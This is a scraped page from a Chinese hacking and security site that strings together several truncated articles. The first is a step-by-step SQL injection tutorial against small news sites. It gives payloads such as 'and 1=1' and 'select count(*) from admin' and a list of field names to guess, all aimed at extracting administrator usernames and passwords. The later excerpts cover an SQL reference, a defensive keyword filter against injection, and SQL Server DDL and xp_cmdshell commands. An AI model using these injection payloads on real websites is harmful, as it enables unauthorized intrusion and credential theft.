一般国内的小一点的新闻站点程序 都有 ""&request 这种漏洞，下面我讲解攻击方法
在地址栏：
and 1=1
查看漏洞是否存在,如果存在就正常返回该页,如果没有,则显示错误，继续假设这个站的数据库存在一个admin表
在地址栏：
and 0<>(select count(*) from admin)
返回页正常,假设成立了。
下面来猜猜看一下管理员表里面有几个管理员ID：
and 1<(select count(*) from admin)
页面什么都没有。管理员的数量等于或者小于1个
and 1=(select count(*) from admin)
输入=1没显示错误，说明此站点只有一个管理员。
下面就是要继续猜测admin 里面关于管理员用户名和密码的字段名称。
and 1=(select count(*) from admin where len(username)>0)
猜解错误!不存在 username 这个字段。只要一直改变括号里面的username这个字段,下面给大家几个常用的
user,users,member,members,userlist,memberlist,userinfo,admin,manager,用户,yonghu
用户名称字段猜解完成之后继续猜解密码字段
and 1=(select count(*) from admin where len(password)>0)
password 字段存在！因为密码字段一般都是这个拉,如果不是就试试pass如果还不是就自己想想吧
我们已 ......

关于我们 | 加入我们 | 网站结构 | 交换连接 | 联系我们
首页
技术文摘
安全漏洞
菜鸟乐园
黑客进阶
资料文库
原创作品
软件下载
技术论坛
SQL完全简明手册
转帖
SQL是Structured Quevy Language(结构化查询语言)的缩写。SQL是专为数据库而建立
的操作命令集，是一种功能齐全的数据库语言。在使用它时，只需要发出“做什么”的
命令，“怎么做”是不用使用者考虑的。SQL功能强大、简单易学、使用方便，已经成
为了数据库操作的基础，并且现在几乎所有的数据库均支持SQL。
##1 二、SQL数据库数据体系结构
SQL数据库的数据体系结构基本上是三级结构，但使用术语与传统关系模型术语不同。
在SQL中，关系模式(模式)称为“基本表”(base table)；存储模式(内模式)称为“存
储文件”(stored file)；子模式(外模式)称为“视图”(view)；元组称为“行”(row)
；属性称为“列”(column)。名称对称如^00100009a^：
##1 三、SQL语言的组成
在正式学习SQL语言之前，首先让我们对SQL语言有一个基本认识，介绍一下SQL语言的
组成：
1.一个SQL数据库是表(Table)的集 ......

BS系统中，传统的注入攻击手段有很多。
最基本的，利用单引号攻击的，很容易解决，用类似于QuotedStr()（实际开发是其他语言，这里用DELPHI中的函数代替）的函数处理参数即可。
但实际应用中，不可避免会有一些应用需要直接传递参数，例如表名、查询条件、排序条件等等
对这些应用的注入攻击防不胜防。
我考虑了一个思路，供大家参考。
1 对所有网页传入的参数分三种。
  a) 数字类型，用StrToInt函数处理。
  b) 字符串类型，用QuotedStr函数处理。
  c) 需要直接传递的参数，这是需要着重考虑的类型。
2 对所有数据库操作主要分五种，不允许程序直接执行SQL语句：
  a) select 查询
  b) update 更新
  c) insert 新增
  d) delete 删除
  e) exec 执行存储过程
3 对于以上几种数据库操作的所有参数，例如select 操作中的 查询条件、排序条件等，都进行合法性校验：
  a) 里面存在 "--" "/*" "*/" 的，都视为非法条件。
  b) 将条件拆分为单词，如果存在以下单词：delete insert update exec execute create drop grant的，都视为非法条件。（正常的表名、字段名中不可能有上面这些关 ......

在PL/SQL块中不能直接调用DDL语句，可以利用下面的方法进行调用
方法一：动态SQL
execute immediate 'CREATE TABLE newtable AS
                                                                 SELECT *
                                                                    from table_my
          &nbs ......

创建一个数据库（库名：学生库）并设置两个数据文件和两个日志文件
create database 学生库
on primary
( name=学生_data1, filename='e:\学生_data1.mdf', size=1mb, maxsize=3mb,filegrowth=1mb ),
( name=学生_data2, filename='e:\学生_data2.ndf', size=1mb, maxsize=3mb, filegrowth=10% )
log on
( name=学生_log1, filename='e:\学生_log1.ldf', size=1mb, maxsize=2mb, filegrowth=1mb ),
( name=学生_log2, filename='e:\学生_log2.ldf', size=1mb, maxsize=2mb, filegrowth=10% )
 
删除数据库：drop database 学生库（数据库名）
 
更改数据库中（数据文件学生_data1）的原始大小结构
alter database 学生库   modify file ( name=学生_data1,size=5mb )
 
更改数据库中（日志文件学生_log1）的原始大小结构
alter database 学生库   modify file ( name=学生_log1,size=2mb )
 
为数据库添加一个日志文件（学生_log3）
alter database 学生库
add file( name=学生_log3, filename='e:\学生_log3.ldf', size=1mb，maxsize=2mb, filegrowth=10% )
 
设置数据库（学生库）为只读：exec sp_dbopt ......

创建文件夹：exec xp_cmdshell 'md 盘符:\文件夹名称', no_output
例如：在D盘创建名为：“资料”的文件夹：exec xp_cmdshell 'md d:\资料', no_output
 
查看文件：exec xp_cmdshell 'dir盘符:\文件夹名称'。例如：exec xp_cmdshell 'dir d:\资料'
判断数据库是否存在：if exists(select * from sysdatabases where name='数据库名称')
drop database 数据库名称
 
判断表是否存在——if exists(select * from sysobjects where name='表名')   drop table 表名
 
添加约束（5种）——语法：alter table 表名 add constraint 约束名约束类型 具体的约束说明
1.主键约束：alter table 表名 add constraint pk_约束名 primary key(主键约束字段名)
2.外键：alter table表名add constraint fk_约束名foreign key(外键字段名) references 关系表(主键名)
3.唯一约束：alter table 表名 add constraint uq_约束名 unique (唯一约束字段名)
4.检查约束：alter table 表名 add constraint ck_约束名 check (约束检查字段名)   --表达式
5.默认约束：alter table 表名 add constraint df_约束名 de ......